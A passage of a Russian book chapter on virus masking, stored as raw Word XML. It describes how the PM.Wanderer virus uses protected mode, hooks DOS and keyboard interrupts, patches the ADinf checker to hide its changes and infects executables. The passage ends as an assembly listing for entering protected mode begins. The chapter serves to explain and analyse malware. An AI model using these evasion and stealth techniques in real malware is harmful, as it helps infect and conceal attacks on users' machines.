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90D" w:rsidRDefault="009C190D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МАСКИРОВКА ВИРУСОВ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>В этой главе рассказано, как</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t>может быть спрятан вирус.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t>Описаны методы конструи-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t>рования прямого обращения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t>к DOS для "обмана" резиден-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t>тных антивирусных монито-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t>ров. Рассмотрены вирусы,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t>заражающие Flash BIOS. Пред-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t>ставлены исходные тексты</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t>программ с подробными ком-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t>ментариями.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Protected Mode - укрытие для вируса</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Персональные компьютеры год от года становятся все сложнее и слож-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>нее, используют все более высокие аппаратные и программные техноло-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>гии. Компьютерные вирусы тоже не отстают и пытаются приспособиться</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>к новым условиям обитания. Так, вирусы научились заражать загрузоч-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ные сектора дисков, файлы для операционных систем DOS, Windows,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Windows 95, OS/2, Linux и даже документы Word, Excel, и MS-Office 97.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Скрывая свое присутствие в системе, они стали невидимками, или</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>стелс-вирусами. Они научились быть полиморфными для того, чтобы</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>их распознавание стало еще более трудной задачей для разработчиков</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>антивирусных средств. С появлением процессоров i386 вирусы стали</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>использовать в своем коде 32-разрядные инструкции. В настоящее вре-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>мя полиморфные вирусы используют 32-разрядные расшифровывающие</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">команды в своем декрипторе. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Одним словом, вирусы хотят выжить и победить. Для этого они исполь-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>зуют все новые возможности, как программные, так и аппаратные. Но</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>защищенный режим работы, появившийся вместе с процессором i286,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>до недавнего времени вирусам никак не удавалось "приручить". Вернее,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">были "пробы пера", но реального решения этой задачи они не дали. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Загрузочный вирус PMBS, первым пытавшийся освоить защищенный ре-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>жим (1994 г.), не мог ужиться ни с одной программой или драйвером</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>(EMM386, Windows, OS/2,...), которые также использовали в своей рабо-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>те защищенный режим. Вирусы Evolution.2761 и Evolution.2770 (тоже</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>1994 г.) использовали только часть мощного защищенного режима и толь-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ко в то время, когда процессор работал в реальном режиме. Данные виру-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">сы заменяли реальную таблицу векторов прерываний на собственную. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Но вот, похоже, проблема близка к разрешению: в России в "диком"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>виде обнаружен файловый вирус PM.Wanderer, использующий защи-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>щенный режим. Причем он более или менее корректно и стабильно вза-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>имодействует с другими программами и драйверами, также использую-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">щими защищенный режим. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>PM.Wanderer является резидентным полиморфным вирусом, использу-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ющим защищенный режим процессоров i386-Pentium. Для установки</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>своей резидентной копии в память и переключения в защищенный ре-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>жим процессора (Protected Mode) вирусом используется документиро-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ванный интерфейс VCPI (Virtual Control Program Interface) драйвера</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">расширенной памяти EMS (EMM386). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr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1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>При старте инфицированной программы вирусный полиморфный дек-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>риптор расшифровывает основное тело вируса и передает ему управле-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ние. Далее основной вирусный код выделяет участок памяти в верхних</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>адресах, копирует в него собственный код и передает ему управление.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Затем он восстанавливает код инфицированного файла в программном</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>сегменте (для ЕХЕ-файлов также производит настройку адресов пере-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>мещаемых элементов) и приступает к непосредственному внедрению</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">в память своей резидентной копии. . </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>В первую очередь вирус пытается вьыснить, установлен ли в системе драй-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>вер EMS. Если этот драйвер не установлен или вирусная резидентная ко-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>пия уже находится в памяти, вирус отдает управление программе-вирусо-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">носителю, заканчивая тем самым свою "жизнедеятельность" в системе. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Если же "условия среды обитания" благоприятствуют, вирус выполня-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ет ряд подготовительных операций для выделения памяти под свое тело</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>и производит переключение процессора в защищенный режим работы</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">с наивысшим уровнем привилегий - режим супервизора. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>В защищенном режиме вирус устанавливает две аппаратные контрольные</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>точки на адреса входа в обработчик прерывания INT 21h (функции DOS)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>и перехода на процедуру перезагрузки компьютера. Кроме того, вирус</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>корректирует дескрипторную таблицу прерываний таким образом, чтобы</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>на прерывания INT 1 (особый случай отладки) и INT 9 (клавиатура) ус-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">тановить собственные дескрипторы обработчиков прерываний. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>После этих приготовлений вирус копирует свой код в страницу памяти,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>полученную им еще до входа в защищенный режим, и производит пере-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ключение процессора обратно в виртуальный режим работы. Затем он</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>начинает процедуру освобождения ранее выделенной памяти DOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">в верхних адресах и возвращает управление инфицированной программе. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>С этого момента инфицированная программа начинает свою основную</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>работу, а в защищенном режиме оказываются установленными вирус-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ные обработчики - ловушки на INT 1 и прерывания от клавиатуры на</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>INT 9. С их помощью вирус контролирует, во-первых, все вызовы фун-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>кций DOS, во-вторых, все нажатия клавиш на клавиатуре, и, в-третьих,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>попытки мягкой перезагрузки компьютера. В свою очередь, такой конт-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>роль обеспечивает вирусу возможность как надежно реагировать на ряд</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>интересующих его событий при работе программы, так и постоянно</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>проверять состояние двух своих контрольных точек и при необходимо-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">сти восстанавливать их. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>В частности, если вирус обнаруживает, что данный вызов исходит</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>от его "собрата", он просто возвращает некоторое условное значение,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>играющее роль отзыва "я - свой". Таким образом, вирус, пытавшийся</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>выяснить наличие своей копии в памяти, будет информирован о том,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">что память уже инфицирована. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Если вирус обнаруживает попытку получения адреса прерывания INT 6</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>(обычно такой вызов существует во всех программах, написанных на</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>языках высокого уровня, например С, Pascal), то он 1"Ъ1тается найти</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>в адресном пространстве некоторую последовательность байт, очевидно</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>принадлежащих программе ADinf, но какой-то старой версии. Кстати,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>по информации разработчика ADinf Дмитрия Мостового, за последний</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>год в версиях ADinf не содержится такая последовательность. Если дан-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ная последовательность вирусом найдена, он определенным образом</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>модифицирует найденный код, чтобы управление не попадало на вызов</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>межсегментной процедуры, демонстрирующей пользователю найденные</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">на диске или в файлах изменения. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Если же вирус обнаруживает запрос на запуск программы или открытие</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>файла (только на чтение), то понимает, что наступило время "большой</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>охоты". Вирус копирует свой код в старшие адреса виртуального про-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>цесса DOS-машины, переключает процессор в виртуальный режим</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">и отдает управление своему коду (процедуре заражения). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>В виртуальном режиме вирус проверяет последние две буквы расшире-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ния имени файла (ОМ или ХЕ), создает свою полиморфную копию</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>и заражает файлы размером более 4095 байт. Файлы, содержащие</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>в поле значения времени создания 34 секунды, вирус не заражает, счи-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>тая их уже инфицированными. Корректировку атрибутов файлов вирус</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>не производит, поэтому все файлы, помеченные как "только для чте-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ния", заражены не будут. Также вирус не заражает программы, имя ко-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>торых состоит из 7 букв. Имена данных программ выяснить не удалось,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>так как вирус не определяет их имена явно, а подсчитывает CRC име-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ни. Вирус не берет на себя обработку критических ошибок, поэтому при</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>попытке записи на защищенный диск в процессе заражения появится</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">стандартный вопрос DOS (...Retry, Ignore, Fail, Abort). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>При заражении файлов вирус использует прямой вызов ядра обработчи-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ка DOS INT 21h. Адрес этого ядра он выясняет при трассировке INT 21h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>во время своей установки в память. Вирусный код внедряется в начало</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>СОМ- или в середину ЕХЕ-файла (сразу же после заголовка). Ориги-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">нальный программный код запоминается в конце файла. Реальный </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>рабочий код вируса составляет 3684 байт, но на практике инфицирован-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ные файлы имеют приращение длины более 3940 байт. В теле вируса</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">содержится текст "WANDERER". </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Обнаружить резидентную копию данного вируса, находящегося в нуле-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>вом кольце защищенного режима процессора, обычными способами не-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>возможно. Для этого необходимо переключаться в защищенный режим</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>с наивысшими привилегиями и производить его поиск. Но попытаться</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">обнаружить признаки вируса в системе можно и обычными способами. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>После обнаружения вируса рекомендуется, как и всегда в таких случа-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ях, перезагрузиться с системной дискеты и выполнить лечение в заведо-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>мо стерильных условиях. Правда, данный вирус не является Stealth-ви-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">русом, и его лечение допустимо даже при активном вирусе. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Теперь немного о результатах тестирования. При заражении несколь-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ких тысяч файлов-жертв вирус проявил себя как "жилец" - все зара-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>женные файлы оказались работоспособными. Здесь надо сделать по-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>правку - файлы могут оказаться неработоспособными в том случае,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>если их стек после заражения окажется в области вирусного кода.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>PM.Wanderer при заражении файлов не корректирует значения стар-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>товых SS:SP в ЕХЕ-заголовке. Как уже отмечалось выше, он сохраняет</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>способность к воспроизводству только в том случае, если в системе уста-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>новлен драйвер EMS (EMM386). При установленном драйвере EMM386</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>с ключом NOEMS вирус перезагружает компьютер. Перезагрузка также</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">возможна, если в системе используется драйвер QEMM386. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Самое интересное, что если в системе находился резидентный вирус,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>а потом произошла загрузка Windows 3.1 или Windows 95, то вирус не</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>сможет размножаться в данных операционных средах, но при выходе</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>в DOS он опять получает управление и может "трудиться, не покладая</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>рук". Если же вирус будет запущен в DOS-сессии Windows, то из-за</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>отсутствия интерфейса VCPI вирус не сможет переключиться в защи-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>щенный режим. При отсутствии VCPI под OS/2 вирус также нежизнес-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">пособен. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Возможно, в недалеком будущем компьютерный вирус сможет полнос-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>тью заменить своим кодом программу-супервизора и сам будет поддер-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">живать интерфейсы DPMI, EMS/VCPI, XMS, INT 15h. Кто знает. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Приведенная ниже программа позволяет программисту перевести про-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>цессор в защищенный режим. В этом режиме вирус может, например,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">расшифровать некоторые данные. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Данная программа делает следующее: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>- создает таблицы GDT и LDT, используя текущие значения</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">CS.DS.SS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>- запрещает все прерывания, открывает линию А20</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">для доступа к RAM&gt;1 Мбайт </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- переводит процессор в защищенный режим </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- в первый символ строки qw заносит символ L </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- выходит в реальный режим </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- разрешает прерывания, закрывает А20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-т</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> выводит на экран строку qw ("Light General") </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- выход в DOS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">.286 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.model tiny</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>.code</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">org 100h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Определения для защищенного режима работы программы</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;Структура дескриптора</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>desc_struc STRUC</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>limit dw 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>baseJ dw 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>base_h db 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>access db 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">rsrv dw 0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">desc_struc ENDS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
